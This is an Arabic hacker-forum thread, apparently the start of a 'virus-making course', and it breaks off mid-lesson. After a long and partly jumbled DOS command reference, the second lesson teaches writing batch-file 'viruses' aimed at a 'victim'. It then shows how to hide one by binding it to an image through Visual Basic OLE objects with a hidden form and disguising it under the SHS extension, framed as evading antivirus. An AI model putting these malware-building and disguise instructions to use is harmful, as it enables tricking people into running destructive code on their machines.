دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]


صفحة 1 من 5 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 45

الموضوع: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

  1. #1
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    Hasri دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]


    و في منتدى جيوش الهكرز الكبير
    دورة إحتراف صنع الفيروسات
    دورة شآآآآآآآملة
    و الرجاء لا ردود إلا بعد الإنتهاء من الدرس 8



    تحية خاصة لكل الأعضاء لكل خاصة الجاهدين على مزيد من الرقي في منتدانا العزيز
    و لن أذكرهم كلهم لتعددهم ماشآء الله

    اليوم انا بهديكم بدورة كاملة لصناعة الفيروسات وتنقسم الي عدة اقسام
    وهي المهم فيها انها لكل مبتديء في عالم الفيروسات وانها مفيدة جدا للمحترفين فقد ترددت كثيرا ولكن لاني واثق فيكم واعلم الله اني بيء كل البراءة من كل من يستخدم هذا المرجع " فبحق وربي هو مرجع في الفيروسات" في ايزاء اي مسلم او اي من لم يؤذية من البشر فمن اهاف هذا المجلد هو ان تعرف كيف تفكر الفيروسات ويكف صنعت واعدكم اني سوف اكملة بكل ما هو جديد وكفانا ان نكون تابعين لابد ان يكون لنا اسلوبنا الخاص في كل شيء ولابد ان يكون لنا بصمة تكتب لنا في هذا العالم لابد ان نضع ذكري يشهد العالم اننا كنا وبحق نفعل ولا يفعل بنا واننا لا نتلاقي فقط ولكن نفعل وبطريقتنا



    لابد ان تقسم بالله العظيم الذي فطر السموات والارض انك اذا استخدمت هذة المعلومات لن تضر إلا الظالمين مهما كانوا

    اذا كان للرجال عزما فهذا العزوم منا تراخت واذا كان للناس حقا عدلا ففي اسلامنا تراحم

    انا بريء منكم يا ذي الكهوم انا كن لله طوعا وانت علي غـــــــــير العادة سئوما

  2. #2
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الفيروسات
    الدرس الاول
    من منا لا يعرف الفيروسات و اخطارها؟! و التدمير الممكن تحقيقه بهذه الفيروسات!
    من يصنع الفيروسات بغرض الاذي, فليس الا مستهتر غبي يستعمل العلم في اشياء مضرة, و من اخطر الفيروسات التي صنعت حتي الان هو فيروس شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب في الحادي و العشرين من عمره لا يهوي الا التدمير..
    مقدمة عن الفيروسات:
    تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما ما سنصنعه الان ليس فيروسات, بل برامج مدمرة تقوم بنفس عمل الفيروسات, و لا يستطيع النورتن كشفها..
    أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب ان يتوافر لديك الذكاء, انظر الي الامثلة و اعرف طريقة صنع هذه الفيروسات ثم اصنع افكار مثلها..
    ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد المسلمين
    بس الدرس الاول دا هيكون عن كلام كتير بس غير الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا اول حاجة ابدا بكل اول الدوس
    اوامر الدوس
    دي اوامر الدوس ودي استعن بشرح الاخ سوفا من منتدي القراصنة
    كلمة (DOS) اختصار لـ Disk Operating System
    * تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
    -دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
    -الملفات:
    إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات.
    تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل.
    * تسمية الملفات:
    ينقسم اسم الملف إلي قسمين:
    القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
    القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم اختياري - يمكن الاستغناء عنه.
    -جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
    ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
    .BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
    .COM ملف برنامج ( COMMAND ).
    .EXE ملف جاهز للتنفيذ ( EXECUTABLE ).
    .DOC ملف نصوص أو وثائق ( ******** ).
    .ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
    .BAK ملف احتياطي ( BACKUP ).
    .BAS ملف برنامج بيسك ( BASIC ).
    .DBF ملف قاعدة بيانات ( DBASE FILE ).
    .PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
    .SYS ملف تكوين نظام ( SYSTEM ).
    .C ملف مصدر مكتوب بلغة سي ( C ).
    الرموز المستخدمة في تسمية الملفات:




    1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ). 2-الأرقام من 0 إلي 9 . 3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، # ، *****! ). **

    * الشروط التي يجب مراعاتها عند اختيار اسم الملف:


    1- طول الاسم الأساسي للملف من 1-8 حروف. 2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف. 3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ). 4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات. 5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم . 6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة. 7- عدم استخدام الرموز ذات الدلالة الخاصة لنظام التشغيل وهي * ، / ، ، + ، = ، ؟).

    تنظيم الملفات على القرص:
    للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة.
    -تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
    -أقسام الأدلة: تقسم الأدلة إلي أربعة أقسام:


    ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
    -ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
    -الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
    -يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.

    ومثال على ذلك:

    إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS ).
    4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا يرتبط بدليل أبوي.
    1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة وتوضع تحته جميع الملفات المنشأة. 2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ). 3-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم. SCHOOLCLASS

    * طريقة تحميل نظام التشغيل من الأسطوانة المرنة:
    هناك طريقتين لعمل ذلك :
    الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )

    2-نقوم بتشغيل جهاز الكمبيوتر .
    الطريقة الثانية: (حين يكون الجهاز يعمل)

    2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
    1-ندخل اسطوانة الدوس في محرك الأقراص A. 1-ندخل اسطوانة الدوس في محرك الأقراص A.

    * رموز محركات الأقراص في نظام التشغيل
    ( DOS ):
    1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
    أ-أسطوانة مرنة حجم 3.5 بوصة.
    ب-أسطوانة مرنة حجم 5.25 بوصة.
    -ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
    2- القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
    3- ( CD-ROM ): ويرمز له بالرمز D أو E.
    * طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :

    * الملفات الأساسية لنظام التشغيل الـ ( DOS ):
    يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
    أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
    ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل.
    ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
    * مكونات نظام التشغيل:
    ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
    الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر .
    * الاختصارات :
    يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما:


    1) الرمز ( ? ) : ويستخدم للدلالة على غياب حرف واحد فقط من اسم أحد الملفات. 2) الرمز ( * ) : ويستخدم للدلالة على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8 أحرف).
    * الأوامر:
    تنقسم أوامر الـ DOS إلى قسمين:

    من أمثلة الأوامر الداخلية:

    2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب.
    من أمثلة الأوامر الخارجية:

    - تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
    1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر لا يستلزم وجود أسطوانة لتنفيذه. CLS - TIME - DATE - MD - CD - RD - DIR - DEL FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT 1
    -أوامر النظام:

    DATE
    VER
    DosKey
    PROMPT
    CLS
    VSAFE
    MEMMAKER
    MODE
    COMMAND
    MSD
    TIME
    DEFRAG
    2 MEM
    -أوامر الاسطوانة:

    CHKDSK
    FORMAT
    DISKCOMP
    DISKCOPY
    MSBACKUP
    SYS
    LABEL
    FDISK
    UNFORMAT
    VOL
    SCANDISK
    3-أوامر الفهرس:

    DIR
    CD
    RD
    MOVE
    DATE
    DELTREE
    MD
    TREE
    4-أوامر الملفات:

    COPY CON
    COPY
    ATTRIB
    DEL
    REN
    UNDELETE
    XCOPY
    PRINT
    FIND
    EDIT
    SORT
    MSAV
    MORE
    HELP
    5-الأوامر الحزمية:

    CALL
    ECHO
    FOR
    IF
    PAUES
    SHIFT CHOICE
    GOTO
    APPEND TYPE REM
    6-أوامر خاصة ونادرة الاستخدام:

    MSCDEX
    CHCP
    INTERLNK
    QBASIC
    DRVSPACE.SYS
    LOADFIX
    SHARE
    FASTHELP
    NLSFUNC
    CTTY
    INSTALL.HIGH
    RECOVER
    DEBUG
    KEYB
    FASTOPEN
    * شرح لأهم الأوامر المستخدمة في نظام الـ
    DOS :
    1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر الداخلية ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
    ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
    ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
    -ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .

    ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
    ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك Enter New Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ.
    -ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
    -شروط كتابة التاريخ في نظام التشغيل DOS:
    1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.





    ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
    ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:40:55.75a وكذلك Enter New Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
    -ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .

    ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
    ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.

    ومن أهم استخدامات الأمر PROMPT التالي:






    ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
    ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
    -ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .




    أهم صور استخدامات الأمر DIR:
    DIR/P لعرض الملفات صفحة صفحة




    DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر









    -رئيسي إلي فرعي
    -فرعي إلي رئيسي
    وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاح ENTER
    10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي فهناك شرطين:




    ومن عيوب الأمر COPY CON إنه:

    2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
    -ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
    أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
    ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.

    -ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .

    مثال(1):

    ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:

    Are you Sure Y/N
    وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
    16-الأمر: PATH وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها.
    -ملاحظات هامة:


    مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز.







    -ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.


    ( نوع المعالج - حجم الذاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).

    21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.




    ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).


    2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله. 2-لا يمكن استخدام التاريخ الهجري. 3-لا يمكن كتابة الأشهر بالحروف. 4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ 5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة . 3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله. 4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر. 5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل. PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي PROMPT $Q تغيير شكل المحث C إلي علامة = PROMPT $$ تغيير شكل المحث C إلي علامة $ PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل 6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي 7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلاله نستطيع عرض : 1-اسم الاسطوانة والرقم المسلسل لها. 2-اسم الفهرس الحالي والمسار الحالي له. 3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده) -مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) . 4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت إنشاء الفهرس ). 5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات. 6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص . DIR/W لعرض الملفات بعرض الشاشة DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z DIR/AH عرض الملفات المخفية فقط DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء DIR/AS عرض ملفات النظام فقط DIR/AD عرض جميع الفهارس فقط بدون الملفات DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط 8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر. 9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته: 1-معرفة الفهرس الحالي 2-الانتقال بين الفهارس إما من: 1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته. 2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على فهرس آخر أعلى منه رتبة. 11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى. 12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها. 1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER. 13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة. 14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما . 15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى. All Files in directory will be deleted 1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد . 2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك. 17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة. 18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته: 1-التحكم في حجم الكتابة وعرضها على الشاشة. 2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي. 19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته: 1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر . 2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة. 20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته: 1-اكتشاف مواصفات الحاسب من حيث: 2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM . 22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية. 23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة. 24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه. 25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية. 26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها. 27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
    -ملاحظة هامة:

    يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه يستحيل إعادة محتويات الأسطوانة كما كانت .




    ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.


    32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.



    ملاحظات هامة:
    28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته: 1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما. 2-نسخ ملف COMMAND.COM إلي أسطوانة ما. 29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين . 30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص . 31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS. 33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر. 34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات. 35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL. 1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة ؟.
    2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
    36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل للقراءة فقط أو غير ذلك.
    37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
    38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
    39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
    -ملاحظات هامة:
    يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
    1-فتح ملف سبق حفظه والتعديل فيه.
    2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
    3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
    -يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
    -لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC.EXE

  3. #3
    هكر مبتديء
    تاريخ التسجيل
    Oct 2009
    الدولة
    tunis/kairouan
    المشاركات
    31

    افتراضي رد: دورة إحتراف صنع الفيروسات [ حتى الإحتراف بإذن الله ]

    الفيروسات
    الدرس الثاني

    طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
    الدرس الثاني
    1-تعريف الملفات الدفاعية :
    هي عبارة عن حزمة من اوامر نظام التشغيل DOS يمكننه من خلاله استخدام اكثر من امر دوسي في وقت واحد مما يسهل للمستخدم الاستخدام مثل استخدام اكثر من امر format,copy,cd ..... |393|
    2-.طرق صناعة الملفات الدفاعية :
    الطريقة الاولى :
    -----------------
    1.افتح -----> start واضغط على Run واكتب command واضغط على ENTAR
    2.اكتب امر(copy con) ثم اسم الفيروس |564| و الامتداد bat ثم اضغط Enter
    3.اكتب الكود
    4.لحفظ طريقتان هما
    1.اضغط على F6 ومن ثم Enter
    2.اضغط على Ctrl + z و من ثم Enter
    الطريقة الثانية :
    -----------------
    1.ابدأ -----> البرامج -----> البرامج الملحقة -----> المفكرة Notepad
    2.اكتب الكود
    3.احفظ الفيروس بامتداد bat و حدد الموقع

    الطريقة الثالثة :
    -----------------
    1.ابدأ -----> البرامج -----> DOS
    2.اكتب Edit
    3.ادخل الكود |312|
    4.قم بحفظ الملف بمتداد bat و حدد المسار الخاص به
    3-ايعازات التشغيل :
    الايعاز الوظيفة
    Echo تمنع عمل الإيعاز ( تعرض سطر على الشاشة )
    Nul نقل بدون السؤال نعم-لا
    Call الدخول الى ملف
    @ يمنع عرض السطر على الشاشة
    Cls يمسح الشاشة
    Puse يقول للضحية الضغط على اي زر
    Start بعد هذا الامر ضع اسم اي برنامج ليتم تغيله عند تشغيل الفيروس
    End يوضع في نهاية الفيروس و هو ينهي الفيروس بعد تنفيذ الاوامر
    /n ايعاز لا
    cd\ الدخول الى ملف
    \cd الخروج من ملف
    /y ايعاز نعم |364|
    ***ارجوا ان تكون واضحة و هي سهلة الاستخدام

    4-طريقة تشفير الفيروس :
    اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير الامتداد من bat الى exe فسوف اذكر السبب في الدرس الرابع في قسم اسئلة و حلول ...
    يمكنك تغير امتداد الـ Batch عن طريق برنامج Microsoft Visual Basic في الاصداران الخامس و السادس :
    1.افتح برنامج الفيجول بيسك
    2.اختر الاداة OLD من قائمة الادوات سوف تظهر لك نافذة Insert Object اختر منها Create from File ثم
    اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط على OK
    3.اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from File ثم Browse واختر الباتش
    الذي تريده ثم اضغط OK
    4.ادخل كود الفروم :
    ----------------------------------
    Microsoft Visual Basic 5.0 :
    LE1.DoVerb OLE2.DoVerb
    ----------------------------------
    Microsoft Visual Basic 6.0 :
    OLE1.DoVerb
    OLE2.DoVerb
    me.hide ' تـقوم باخفاء الفورم
    ----------------------------------
    5.من قائمة File اختر Make Project1.exe سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته مثلا اكتب Virus |105| لقد انتهينا من دمج الباتش مع الصوره ولكن امتداده EXE
    6.الان سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف|104| من قبل الكثير من مستخدمي الانترنت والامتداد
    هو SHS وهذا الامتداد جدا خطير لما فيه من امكانيات الاتصال مع البرامج الاخرى وهو Scrap Object
    والطريقه هي كالتالي :
    1.قم بتشغيل برنامج WordPad افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف
